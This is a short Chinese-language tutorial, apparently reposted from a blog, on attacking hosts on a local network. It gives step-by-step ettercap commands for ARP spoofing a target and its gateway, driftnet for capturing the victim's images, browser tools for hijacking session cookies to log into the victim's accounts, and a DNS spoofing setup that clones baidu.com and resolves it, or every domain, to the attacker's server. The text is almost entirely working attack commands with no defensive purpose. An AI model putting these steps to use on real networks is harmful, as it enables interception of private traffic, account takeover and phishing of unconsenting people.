1.arp欺骗
简单原理:主机A说自己是网关,骗将发给网关的数据发给主机A,然后由主机A发送给真正的网关;主机A告诉网关它就是主机B,骗将发给B的数据发给主机A,然后由A转发给主机B。
ettercap工具:
ettercap -C 或者 ettercap -G
Hosts---Scan for hosts---Hosts list
选择目标ip---add to target 1---选定网关ip---add to target 2
mitm --- arp posoning --- sniff remote connections
start --- start sniffing
view -- connections
2.利用ettercap+driftnet截获目标主机的图片数据流
ettercap -i eth0 -Tq -M arp:remote /目标ip/ /网关ip/ #eth0是网卡,对目标主机进行arp欺骗 也可以使用上面的方式
driftnet -i eth0 #监听网卡 eth0
3.利用cookie劫持,登入被攻击者的网络账户
chrome:安装Cookie利用神器,CookieHacker,安装地址:https://github.com/evilcos/cookiehacker
firefox:安装Scripish+Original Cookie Injector,构建一个可以在特定网页中嵌入cookies的工具:
Scripish脚本引擎下载地址:https://addons.mozilla.org/zh-CN/firefox/addon/scriptish/
Original Cookie Injector脚本安装地址:http://userscripts.org/scripts/show/119798
直接手动注入cookie即可
4.DNS欺骗
1)虚拟机网络选择桥接模式,不勾选“复制物理网络连接状态”:#保证在同一个网段
2)wget -d -r -c url地址
3)将网站源文件放到httpd的默认文件夹下 :/var/www/ #一定要将index.html 的那层目录存在/var/www/下
4)vim /etc/ettercap/etter.dns #新增几个A记录,解析到本机,如
www.baidu.com A 192.168.43.133(写本机的ip) #新增A记录,将www.baidu.com 解析到本机
*.*.* A 192.168.43.133 #将所有域名解析到本机
6)ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /目标ip// /网关ip// #开始dns欺骗
6)service apache2 start #启动apache服务器,目标计算机访问www.baidu.com会跳转到本机服务器
144115199312887883
原文:https://www.cnblogs.com/muphy/p/12284639.html